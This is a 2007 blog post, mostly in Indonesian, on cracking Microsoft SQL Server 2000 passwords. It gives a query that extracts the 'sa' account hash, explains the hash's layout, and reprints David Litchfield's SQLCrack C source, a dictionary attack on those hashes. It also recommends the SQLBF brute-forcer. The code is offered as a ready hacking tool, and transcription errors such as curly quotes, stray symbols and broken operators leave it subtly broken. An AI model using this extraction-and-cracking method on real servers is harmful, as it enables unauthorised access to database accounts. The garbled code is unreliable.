«
»

Microsoft SQL Server Hacking

Microsoft SQL Server Hacking
————————————-
. Gunakan SQL Quary Analyzer (Paket ini biasanya sudah ada jika Anda mengintall Ms. SQL Server) atau
Anda juga bisa memanfaatkan paket lain seperti Handy SQL.
. Jalan perintah Query sbb :

————————————————————————–
select password from master.dbo.sysxlogins where name=’sa’
————————————————————————–

. Anda akan mendapatkan hash ‘sa’ sebagai berikut :
0x01008D504D65431D6F8AA7AED333590D7DB1863CBFC98186BFAE06EB6B327EFA5449E6F649BA954AFF4057056D9B

ingat : ini adalah hash utk ‘sa’ di PC saya.

. Mari kita gunakan ‘clear hashsing’

0×0100 —–> constant header
8D504D65 —–> to calls to rand()
431D6F8AA7AED333590D7DB1863CBFC98186BFAE —–> case sensitif SHA HASH
06EB6B327EFA5449E6F649BA954AFF4057056D9B —–> upper case SHA HASH

. Gunakan pemecah HASH berikut ini :

—————————————————————
SQLCrackCl

This will perform a dictionary attack against the
upper-cased hash for a password. Once this
has been discovered try all case variant to work
out the case sensitive password.

This code was written by David Litchfield to
demonstrate how Microsoft SQL Server 2000
passwords can be attacked. This can be
optimized considerably by not using the CryptoAPI.

(Compile with VC++ and link with advapi32.lib
Ensure the Platform SDK has been installed, too!)

* Script ini telah di uji oleh : lirva32
dan utk aplikasi pembobolan MS. SQL Server Anda juga
bisa mempergunakan aplikasi jadi : SQLBF, silahkan
googling dan donload.

—————————————————————-

#include <stdio.h>
#include <windows.h>
#include <wincrypt.h>
FILE *fd=NULL;
char *lerr = “\nLength Error!\n”;
int wd=0;
int OpenPasswordFile(char *pwdfile);
int CrackPassword(char *hash);
int main(int argc, char *argv[])
{
int err = 0;

if(argc !=3)
{
printf(“\n\n*** SQLCrack *** \n\n”);
printf(“C:\\>%s hash passwd-file\n\n”,argv[0]);
printf(“David Litchfield (david@ngssoftware.com)\n”);
printf(“24th June 2002\n”);
return 0;
}
err = OpenPasswordFile(argv[2]);
if(err !=0)
{
return printf(“\nThere was an error opening the password file %s\n”,argv[2]);
}
err = CrackPassword(argv[1]);
fclose(fd);
printf(“\n\n%d”,wd);
return 0;
}
int OpenPasswordFile(char *pwdfile)
{
fd = fopen(pwdfile,”r”);
if(fd)
return 0;
else
return 1;
}
int CrackPassword(char *hash)
{
char phash[100]=”";
char pheader[8]=”";
char pkey[12]=”";
char pnorm[44]=”";
char pucase[44]=”";
char pucfirst[8]=”";
char wttf[44]=”";
char uwttf[100]=”";
char *wp=NULL;
char *ptr=NULL;
int cnt = 0;
int count = 0;
unsigned int key=0;
unsigned int t=0;
unsigned int address = 0;
unsigned char cmp=0;
unsigned char x=0;
HCRYPTPROV hProv=0;
HCRYPTHASH hHash;

DWORD hl=100;
unsigned char szhash[100]=”";
int len=0;
if(strlen(hash) !=94)
{
return printf(“\nThe password hash is too short!\n”);
}
if(hash[0]==0×30 && (hash[1]== ‘x’ || hash[1] == ‘X’))
{
hash = hash + 2;
strncpy(pheader,hash,4);
printf(“\nHeader\t\t: %s”,pheader);
if(strlen(pheader)!=4)
return printf(“%s”,lerr);
hash = hash + 4;
strncpy(pkey,hash,8 ) ;
printf(“\nRand key\t: %s”,pkey);
if(strlen(pkey)! = 8 )
return printf(“%s”,lerr);
hash = hash + 8;
strncpy(pnorm,hash,40);
printf(“\nNormal\t\t: %s”,pnorm);
if(strlen(pnorm)!=40)
return printf(“%s”,lerr);
hash = hash + 40;
strncpy(pucase,hash,40);
printf(“\nUpper Case\t: %s”,pucase);
if(strlen(pucase)!=40)
return printf(“%s”,lerr);
strncpy(pucfirst,pucase,2);
sscanf(pucfirst,”%x”,&cmp);
}
else
{
return printf(“The password hash has an invalid format!\n”);
}
printf(“\n\n Trying…\n”);
if(!CryptAcquireContextW(&hProv, NULL , NULL , PROV_RSA_FULL ,0))
{
if(GetLastError()==NTE_BAD_KEYSET)
{
// KeySet does not exist. So create a new keyset
if(!CryptAcquireContext(&hProv,

NULL,
NULL,
PROV_RSA_FULL,
CRYPT_NEWKEYSET ))
{
printf(“FAILLLLLLL!!!”);
return FALSE;
}
}
}
while(1)
{
// get a word to try from the file
ZeroMemory(wttf,44);
if(!fgets(wttf,40,fd))
return printf(“\nEnd of password file. Didn’t find the password.\n”);
wd++;
len = strlen(wttf);
wttf[len-1]=0×00;
ZeroMemory(uwttf,84);
// Convert the word to UNICODE
while(count < len)
{
uwttf[cnt]=wttf[count];
cnt++;
uwttf[cnt]=0×00;
count++;
cnt++;
}
len –;
wp = &uwttf;
sscanf(pkey,”%x”,&key);
cnt = cnt – 2;
// Append the random stuff to the end of
// the uppercase unicode password
t = key >> 24;
x = (unsigned char) t;
uwttf[cnt]=x;
cnt++;
t = key << 8;
t = t >> 24;

x = (unsigned char) t;
uwttf[cnt]=x;
cnt++;
t = key << 16;
t = t >> 24;
x = (unsigned char) t;
uwttf[cnt]=x;
cnt++;
t = key << 24;
t = t >> 24;
x = (unsigned char) t;
uwttf[cnt]=x;
cnt++;
// Create the hash
if(!CryptCreateHash(hProv, CALG_SHA, 0 , 0, &hHash))
{
printf(“Error %x during CryptCreatHash!\n”, GetLastError());
return 0;
}
if(!CryptHashData(hHash, (BYTE *)uwttf, len*2+4, 0))
{
printf(“Error %x during CryptHashData!\n”, GetLastError());
return FALSE;
}
CryptGetHashParam(hHash,HP_HASHVAL,(byte*)szhash,&hl,0);
// Test the first byte only. Much quicker.
if(szhash[0] == cmp)
{
// If first byte matches try the rest
ptr = pucase;
cnt = 1;
while(cnt < 20)
{
ptr = ptr + 2;
strncpy(pucfirst,ptr,2);
sscanf(pucfirst,”%x”,&cmp);
if(szhash[cnt]==cmp)
cnt ++;
else
{
break;
}
}
if(cnt == 20)
{

// We’ve found the password
printf(“\nA MATCH!!! Password is %s\n”,wttf);
return 0;
}
}
count = 0;
cnt=0;
}
return 0;
}

Advertisement

This entry was posted on April 16, 2007 at 4:33 pm and is filed under Uncategorized. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Cancel

Connecting to %s

Follow

Get every new post delivered to your Inbox.